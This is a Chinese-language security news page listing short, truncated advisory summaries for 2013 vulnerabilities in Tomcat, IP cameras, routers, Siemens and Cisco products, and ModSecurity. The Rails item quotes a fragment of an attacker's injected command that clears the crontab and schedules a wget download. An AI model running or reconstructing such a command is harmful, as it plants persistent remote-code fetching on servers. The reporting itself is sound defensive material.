ModSecurity 的拒绝服务漏洞已修复

2016年10月21日 9 阅读

ModSecurity 开发团队已经修复了 DoS 拒绝服务漏洞，该漏洞可使得攻击者搞垮防火墙，通过使用攻击 HTTP 请求来执行 forceRequestBodyVariable 和一个未知的内容类型可导致一个空指针引用。通过将程序升级到 2.7.4 版本可修复此问题，该版本同时也修复了一些小 bug和 libinjection 用于识别 SQL 注入攻击，同时开发团队也宣布了其 Nginx 移植版本已经达到稳定条件。Apache Struts "inc...

Zavio IP Cameras 任意命令注入漏洞（CVE-2013-2568）

2016年10月21日 10 阅读

发布日期：2013-05-28更新日期：2013-05-29受影响系统：Zavio Zavio IP Cameras <= 1.6.03描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60190CVE（CAN） ID: CVE-2013-2568Zavio IP Cameras是网络摄像机产品。Zavio IP...

Apache Tomcat DIGEST Authentication重放攻击漏洞（CVE-2013-2051）

2016年10月21日 11 阅读

发布日期：2013-05-03更新日期：2013-05-29受影响系统：Apache Group Tomcat 7.0.0 - 7.0.30Apache Group Tomcat 6.0.0 - 6.0.36Apache Group Tomcat 5.5.0 - 5.5.36描述：--------------------------------------------------------------------------------BUGTRAQ I...

Apache Tomcat 不安全临时文件处理漏洞（CVE-2013-1976）

2016年10月21日 9 阅读

发布日期：2013-05-28更新日期：2013-05-29受影响系统：Apache Group Tomcat描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60186CVE（CAN） ID: CVE-2013-1976Apache Tomcat是一个流行的开源JSP应用服务器程序。Apache Tomcat服务中i...

WordPress Image Slider with Description插件安全漏洞

2016年10月21日 9 阅读

发布日期：2013-05-24更新日期：2013-05-29受影响系统：WordPress Image Slider with Description 6.x描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60183Image Slider with Description是可以显示图像、标题、描述的图形滑块插件。I...

socat 远程拒绝服务漏洞（CVE-2013-3571）

2016年10月21日 9 阅读

发布日期：2013-05-26更新日期：2013-05-29受影响系统：socat socat 2.0.0-b1 - 2.0.0-b5socat socat 1.2.0.0 - 1.7.2.1描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60170CVE（CAN） ID: CVE-2013-3571Socat是一个...

Siemens Scalance X200系列交换机SNMPv3远程安全绕过漏洞

2016年10月21日 10 阅读

发布日期：2013-05-24更新日期：2013-05-29受影响系统：Siemens Scalance X-200 Series Switches描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60168CVE（CAN） ID: CVE-2013-3634Siemens Scalance X200系列交换机可用于连...

LG Optimus G E973命令注入漏洞（CVE-2013-3666）

2016年10月21日 9 阅读

发布日期：2013-05-27更新日期：2013-05-29受影响系统：LG Optimus G E973描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60162CVE（CAN） ID: CVE-2013-3666LG Optimus G E973 是款智能手机。LG Optimus G E973等多款智能手机的"...

Siemens Solid Edge SEListCtrlX ActiveX内存破坏漏洞

2016年10月21日 10 阅读

发布日期：2013-05-26更新日期：2013-05-30受影响系统：Siemens Solid Edge ST5 105.xSiemens SEListCtrlX ActiveX Control 105.xSiemens WebPartHelper ActiveX Control 105.x描述：-------------------------------------------------------------------------------...

Rails 框架遭受持续不断的攻击波

2016年10月21日 9 阅读

在过去的几天里，攻击者已经越来越多地试图通过一个 Rails 框架的安全漏洞来攻陷服务器。成功的入侵者在服务器上安装一个机器人，使其等到来自 IRC 频道的进一步指示。在安全专家 Jeff Jarmoc 的博客中写到，攻击者是通过 CVE 2013-0156 漏洞试图攻击的。尽管该漏洞已经在1月份时关闭，但还有相当多的服务器仍然运行过时的 Ruby 版本。Jarmoc 称攻击者尝试注入如下命令：crontab -r; echo "1 * * * * wge...

YeaLink IP Phone SIP-T20P/SIP-T26P安全绕过漏洞

2016年10月21日 9 阅读

发布日期：2013-05-29更新日期：2013-05-30受影响系统：yealink Yealink SIP-T20P IP Phone yealink SIP-T26P描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60204YeaLink IP Phone SIP-T20P、SIP-T26P是企业级HD IP电...

TP-LINK IP Cameras硬编码凭证安全绕过漏洞（CVE-2013-2572）

2016年10月21日 9 阅读

发布日期：2013-05-28更新日期：2013-05-30受影响系统：TP-LINK IP Cameras <= 1.6.18P12描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60194CVE（CAN） ID: CVE-2013-2572TP-LINK IP Cameras是网络摄像机产品。TP-LINK...

TP-LINK IP Cameras命令注入漏洞（CVE-2013-2573）

2016年10月21日 9 阅读

发布日期：2013-05-28更新日期：2013-05-30受影响系统：TP-LINK IP Cameras <= 1.6.18P12描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60195CVE（CAN） ID: CVE-2013-2573TP-LINK IP Cameras是网络摄像机产品。TP-LINK...

MayGion IP Camera 目录遍历漏洞（CVE-2013-1604）

2016年10月21日 10 阅读

发布日期：2013-05-28更新日期：2013-05-30受影响系统：MayGion IP Camera <= 09.27描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60192CVE（CAN） ID: CVE-2013-1604MayGion IP Camera是网络摄像机产品。MayGion IP Ca...

RSA Authentication Manager 多个信息泄露漏洞（CVE-2013-0947）

2016年10月21日 12 阅读

发布日期：2013-05-29更新日期：2013-05-30受影响系统：RSA Security RSA Security Authentication Manager 8.0不受影响系统：RSA Security RSA Security Authentication Manager 7.1RSA Security RSA Security Authentication Manager 6.1描述：----------------------------...

Sleipnir Mobile for Android地址栏欺骗漏洞（CVE-2013-2317）

2016年10月21日 10 阅读

发布日期：2013-05-29更新日期：2013-05-31受影响系统：Sleipnir Mobile for Android Sleipnir Mobile for Android描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60200CVE（CAN） ID: CVE-2013-2317Sleipnir Mobi...

TP-LINK TL-WR842ND目录遍历漏洞

2016年10月21日 9 阅读

发布日期：2013-05-29更新日期：2013-05-30受影响系统：TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632TP-LINK TL-WR842ND描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60206TP-LINK TL-WR842ND是无线宽带路由器产...

MayGion IP Camera 远程缓冲区溢出漏洞（CVE-2013-1605）

2016年10月21日 9 阅读

发布日期：2013-05-28更新日期：2013-05-30受影响系统：MayGion IP Camera <= 09.27描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60196CVE（CAN） ID: CVE-2013-1605MayGion IP Camera是网络摄像机产品。MayGion IP Ca...

XnView 堆缓冲区溢出漏洞（CVE-2013-3247）

2016年10月21日 10 阅读

发布日期：2013-05-29更新日期：2013-06-01受影响系统：XnView XnView 2.x描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60233CVE（CAN） ID: CVE-2013-3247XnView是一款浏览的图片查看器，支持多种图形格式。XnView 2.00及其他版本在解压RLE压缩...

Cisco NX-OS Software for Nexus 1000 Series SSL证书验证安全绕过漏洞（CVE-2013-1212）

2016年10月21日 10 阅读

发布日期：2013-05-29更新日期：2013-06-01受影响系统：Cisco NX-OS 4.x描述：--------------------------------------------------------------------------------BUGTRAQ ID: 60225CVE（CAN） ID: CVE-2013-1212Cisco NX-OS是一个数据中心级的操作系统。Cisco Nexus 1000V的SSL实现存在安全漏...